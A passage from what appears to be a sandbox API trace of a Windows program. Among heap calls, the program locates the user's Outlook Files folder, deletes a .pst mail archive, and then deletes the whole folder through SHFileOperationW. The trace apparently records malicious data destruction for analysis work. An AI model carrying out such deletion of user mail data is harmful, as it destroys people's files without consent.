hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0265.958] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.958] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0265.960] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Outlook Files", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x8bedfc*="Outlook Files") returned 0x35 [0265.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0265.960] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0265.961] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e7c, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0265.961] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e7c, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0265.961] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1e7c, dwReserved1=0x4, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0265.962] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0265.962] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1e7c, dwReserved1=0x4, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0265.962] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0265.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.963] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0265.964] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.964] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0265.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0265.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Outlook Files", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x8bf658*="Outlook Files") returned 0x35 [0265.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0265.967] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0265.967] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\